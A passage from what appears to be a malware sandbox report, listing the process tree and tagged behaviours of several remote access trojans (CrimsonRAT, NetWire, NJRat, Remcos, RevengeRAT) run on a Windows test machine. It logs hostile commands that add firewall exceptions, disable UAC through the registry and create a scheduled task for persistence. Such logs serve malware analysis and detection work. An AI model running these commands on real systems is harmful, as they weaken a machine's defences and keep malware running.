  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:1
  2⤵
  PID:4024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6316 /prefetch:1
  2⤵
  PID:3200

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4720

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1656

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3964

C:\Users\Admin\Desktop\CrimsonRAT.exe
"C:\Users\Admin\Desktop\CrimsonRAT.exe"
1⤵
PID:3568
- C:\ProgramData\Hdlharas\dlrarhsiva.exe
  "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
  2⤵
  - Executes dropped EXE
  PID:3108

C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
1⤵
PID:4604
- C:\Users\Admin\Desktop\NetWire.exe
  "C:\Users\Admin\Desktop\NetWire.exe"
  2⤵
  PID:1712

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004C0
1⤵
PID:5164

C:\Users\Admin\Desktop\NJRat.exe
"C:\Users\Admin\Desktop\NJRat.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:5236
- C:\Windows\SysWOW64\netsh.exe
  netsh firewall add allowedprogram "C:\Users\Admin\Desktop\NJRat.exe" "NJRat.exe" ENABLE
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  PID:2220

C:\Users\Admin\Desktop\Remcos.exe
"C:\Users\Admin\Desktop\Remcos.exe"
1⤵
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5312
- C:\Windows\SysWOW64\cmd.exe
  /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5344
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:5432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5504
- - C:\Windows\SysWOW64\PING.EXE
    PING 127.0.0.1 -n 2
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5580
- - C:\Windows\SysWOW64\Userdata\Userdata.exe
    "C:\Windows\SysWOW64\Userdata\Userdata.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:5624
  - - C:\Windows\SysWOW64\cmd.exe
      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5660
    - - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:5760
  - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
      "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
      4⤵
      PID:5680

C:\Users\Admin\Desktop\RevengeRAT.exe
"C:\Users\Admin\Desktop\RevengeRAT.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5784
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  - Drops startup file
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  PID:5844
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:5888
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gvrxy13j.cmdline"
    3⤵
    PID:248
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE2D0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcAFC72D2337E54361ABF3C9246BC9E1D5.TMP"
      4⤵
      PID:448
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\arv4zygl.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4004
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE34D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE7BCCDBAFB7643E98CADBC66CFCA12A1.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3896
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\khu4sueu.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2400
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE3D9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5D4F991148E94C93A9E133A86D886AB.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1316
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\s90a0oee.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5516
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE466.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD7E471FE69FA449FAFDB22CF7292A137.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5096
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tpqmer4n.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3024
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE4F3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc94352D8AECBB474C84E37D9BBF842DF1.TMP"
      4⤵
      PID:5196
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:4680
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
      4⤵
      Drops startup file
      Adds Run key to start application
      Drops autorun.inf file
      Suspicious use of SetThreadContext
      NTFS ADS
      Suspicious use of AdjustPrivilegeToken
      PID:1052
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2396
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zggweuyl.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5760
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D1C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7C20D80419A54371BC65F8AC63BF6AD.TMP"
        6⤵
        
        PID:4856
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1812
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pxnjhtc8.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5740
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA40C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE827622A351A4B9EBA2A19E0576F86AC.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4104
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dqm1cn2f.cmdline"
        5⤵
        
        PID:5768
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA489.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5D28AC1257A74C60AFA7EAF4CF09EC1.TMP"
        6⤵
        
        PID:672
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-s4cjwq2.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3272
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA516.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9B7166C9CB0240FCB7D9E6258403AFA.TMP"
        6⤵
        
        PID:4576
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gxzldr_o.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1204
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5A3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc58718014AFFC4E3794402D2217191FBD.TMP"
        6⤵
        
        PID:5292
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\butbzaw-.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4024
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA67D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEBE7AFA4FFFF45FE962C2E8DF2BC2C6.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4228
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xs4tzrtd.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4768
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6FA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc981D16B273274A479078A98D49298F3.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5988
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mpnccqy_.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:720
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA777.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc614E632E2C7A4D02B04F74D886F3CA2.TMP"
        6⤵
        
        PID:3548
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gysr5tsy.cmdline"
        5⤵
        
        PID:5112
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA814.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFF687A29CD554847A9322786F694A75.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1900
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wq6vvhoz.cmdline"
        5⤵
        
        PID:328
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA8B0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF776E171734F499892E035279D8F0ED.TMP"
        6⤵
        
        PID:3200
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xz4nylbi.cmdline"
        5⤵
        
        PID:2064
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA90E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEFCDE792FF54801B39EFBF34DB07A.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4804
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rrgsftme.cmdline"
        5⤵
        
        PID:2404
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA9AA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2E4A621B5BE44D8DAFF7D1BCF425BEC4.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3788
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gcnebcuy.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2572
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE02B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDB71CFD97D3B40949C67A8BD8D9CF28F.TMP"
        6⤵
        
        PID:5888
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yse761k1.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5644
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4250.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE2E6DB50D7954CAE9EDF2A8E093C199.TMP"
        6⤵
        
        PID:5512
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-cgnqf9l.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:568
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA4E2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE46547D7B10346098FA8AAA39A69A4EA.TMP"
        6⤵
        
        PID:4572
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bnrjbgx6.cmdline"
        5⤵
        
        PID:5448
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES736.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc72649341D911470F8C5939F77BE884FB.TMP"
        6⤵
        
        PID:5456
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mszy-ze8.cmdline"
        5⤵
        
        PID:3168
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES699A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc50FB36DB22B34253874EB8AC996CABD8.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5800
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qisdhsvj.cmdline"
        5⤵
        
        PID:5792
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC2C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc429A0314A63E434FA7472181EED28596.TMP"
        6⤵
        
        PID:1168
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pik20hif.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1800
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3660.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5A4A02D8C03437391B599D747D9DEE.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5516
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ijayrklw.cmdline"
        5⤵
        
        PID:5896
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3769.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEC19BD99E991414FA9FB9AD48445A6F7.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4896
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gpmbfvqb.cmdline"
        5⤵
        Drops autorun.inf file
        
        PID:1836
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3844.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC5A6A3BD8754497882BEA98F1FB7541.TMP"
        6⤵
        
        PID:1616
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-sinekgg.cmdline"
        5⤵
        
        PID:1544
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9A59.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcED0DAA2825A74C2DB2935A8AD8D3F77.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4228
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cbuscct6.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3352
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9AD6.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4EF79E627DCA4A1E9153CF2DB6A4E0E8.TMP"
        6⤵
        
        PID:4876
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\2lhpvp8x.cmdline"
        5⤵
        Drops autorun.inf file
        
        PID:2880
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9B73.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEF6BACA1556240F8916A3E2A8B1F7A8B.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2024
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\17lou5lj.cmdline"
        5⤵
        
        PID:5344
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9BF0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB6CA599DC9EC4F658FF343E767A1A5.TMP"
        6⤵
        
        PID:5156
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6amb61nv.cmdline"
        5⤵
        Drops autorun.inf file
        System Location Discovery: System Language Discovery
        
        PID:3524
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9C6D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC3735AF17DB14633A75BD7B79ED4BC0.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5408
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\1tzdmdbf.cmdline"
        5⤵
        
        PID:3196
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF0F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB120F39DE2264B7B8897C5EB9584588.TMP"
        6⤵
        
        PID:3860
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\p3ae3xia.cmdline"
        5⤵
        
        PID:1168
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5516
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
